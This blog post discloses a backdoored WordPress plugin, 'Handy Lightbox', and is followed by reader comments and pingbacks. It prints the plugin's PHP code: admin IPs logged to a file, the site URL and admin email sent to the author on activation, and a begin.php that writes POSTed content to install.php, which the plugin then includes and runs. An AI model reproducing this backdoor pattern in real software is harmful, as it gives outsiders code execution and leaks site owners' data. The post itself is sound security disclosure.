The sad state of WordPress plugins

Migrating your WordPress website to a new host is usually a breeze. Same goes for installing plugins and themes. But what is running behind the scenes when using these community provided plugins and themes?

Handy Lightbox

Let us start with the first example, a plugin I had installed on this blog named “Handy Lightbox”. Behaviour is simple and straightforward, enable Lightbox jQuery plugin for images on your website. Everything works fine, until you take a look at the code. Let us look at the first issue that popped up because I do not allow my webserver user to write to any directory.

$requrl = $_SERVER["REQUEST_URI"];
$ip = $_SERVER['REMOTE_ADDR'];
if (eregi("admin", $requrl)) {
$inside = "yes";
} else {
$inside = "no";
}
if ($inside == 'yes') {
$filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt';
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
fclose($handle);
$filestring = $contents;
$findme  = $ip;
$pos = strpos($filestring, $findme);
if ($pos === false) {
$contents = $contents . $ip;
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
fwrite($fp, $contents);
fclose($fp);
}
}

Code quality aside, it writes every admin’s IP into a file called welcome.txt. Why?

Next up, e-mailing the developer to confirm plugin activation and reporting site url. The e-mail address has been changed by me.

/** Activate The Plugin */

function actithelightbox_activate() { 
$yourip = $_SERVER['REMOTE_ADDR'];
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
fwrite($fp, $yourip);
fclose($fp);
add_option('redirectlightbox_do_activation_redirect', true);
session_start(); $subj = get_option('siteurl'); $msg = "Plugin Activated"; $from = get_option('admin_email'); mail("authoremail@gmail.com", $subj, $msg, $from);
wp_redirect('../wp-admin/options-general.php?page=jquery-lightbox-options');
}

The same is done when uninstalling the plugin.

/** Uninstall The Plugin */
function deactthelightbox_deactivate() { 
session_start(); $subj = get_option('siteurl'); $msg = "Plugin Uninstalled"; $from = get_option('admin_email'); mail("authoremail@gmail.com", $subj, $msg, $from);
}

And I am not sure how this can be considered “outputting SEO”.

function outputseo() {
if (is_user_logged_in()) {
$ip = $_SERVER['REMOTE_ADDR'];
$filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt';
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
fclose($handle);
$filestring= $contents;
$findme  = $ip;
$pos = strpos($filestring, $findme);
if ($pos === false) {
$contents = $contents . $ip;
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
fwrite($fp, $contents);
fclose($fp);
}

}

$filename = ($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/install.php');

if (file_exists($filename)) {

    include($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/install.php');

} 
}

But wait, there is more! Have a look at begin.php in his plugin. Which I actually only uncovered while writing this blog post.

session_start();
$installtheplugin = $_POST['installit'];
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/install.php', 'w');
$installtheplugin = str_replace('\\', '', $installtheplugin);
$installtheplugin = htmlentities($installtheplugin);
fwrite($fp, html_entity_decode($installtheplugin));
fclose($fp);
echo $installtheplugin;

Allowing someone externally to upload a file, save it under “install.php” and execute it. Since the plugin author has the URL to every installation made, they can easily abuse this script. Or anyone else that knows about the issues this plugin has.

I have contacted the developer, but I do not expect much of a reply.

17 thoughts on “The sad state of WordPress plugins

  1. gi1242

    I found the same problem (independently). I left a review on the plugins website. I’d suggest you do the same (and link to your blog post) to warn others.

  2. Michael

    When you discover a plugin behaving in a way that is against the guidelines, the best thing to do is to alert the plugins team by emailing plugins at wordpress.org as soon as possible so they can review it and act accordingly.

    The plugins team were alerted about this plugin a few days ago after the review mentioning it was posted and the plugin has since been removed from the plugins directory.

  3. tstr

    I’ve recently come across this article and ones like it. Since I have this plugin installed on a site already, is there any way to remove the code that sends the IPs without removing any functionality of the lightbox while I search for a new lightbox plugin?

  4. Jonny

    I think deleting or emptying the begin.php or outputseo() could be safe as it only writes content to this file and so wouldd effectively render it useless since it would prevent the file-upload.

  5. Dom Wint

    Hi there

    Just found a flaw in this plugin myself. My code knowledge is absolutely minimal, but after discounting suspicious-looking core files I deactivated my plugins and the hacked link that was appearing (blackjackonline.us.org) went away. Only when I reactivated Handy Lightbox did it return.

    Looking in the plugin folder, there was the “install.php” file. Deleted it and the issue went away. Deleted the plugin anyway. I can do without this hassle. I notice that Handy Lightbox isn’t available on the repo anymore.

    Need to be a bit more careful with my plugin selections in future. Thanks for the write-up. Confirmed my suspicions.

    Dom

  6. Pingback: Three Years Later, Hundreds of Sites Still Use Backdoored WordPress Plugins – BleepingComputer – itips.click

  7. Pingback: Three Years Later, Hundreds of Sites Still Use Backdoored WordPress Plugins – BleepingComputer – ITC

  8. Pingback: Three Years Later, Hundreds of Sites Still Use Backdoored WordPress Plugins – BleepingComputer | ittips.work

  9. Pingback: Сотни сайтов на WordPress используют плагины с бэкдорами, обнаруженными три года назад – Хакер – itips.click

  10. Pingback: Сотни сайтов на WordPress используют плагины с бэкдорами, обнаруженными три года назад – Хакер | ittips.work

  11. Pingback: Plugins vulnerables de WordPress de 2014 aún presentes en instalaciones – Seguridad PY

  12. Pingback: Plugins vulnerables de WordPress de 2014 aún presentes en instalaciones - Sapsi Security Services

  13. Pingback: Сотни сайтов на WordPress используют плагины с бэкдорами, обнаруженными три года назад – Хакер – ITC

  14. Alonso

    Hello from Santiago de Chile. My name is Alonso busotz. Have you a twitter?, I Would like to follow you in twitter, Thanks

    @iplaclasscl

  15. Pingback: Hundreds of WP sites continued to use backdoored plugins – BleepingComputer – itips.click

  16. Pingback: Hundreds of WP sites continued to use backdoored plugins – BleepingComputer | ittips.work

  17. Pingback: Hundreds of WP sites continued to use backdoored plugins – BleepingComputer – ITC

Leave a Reply

Your email address will not be published. Required fields are marked *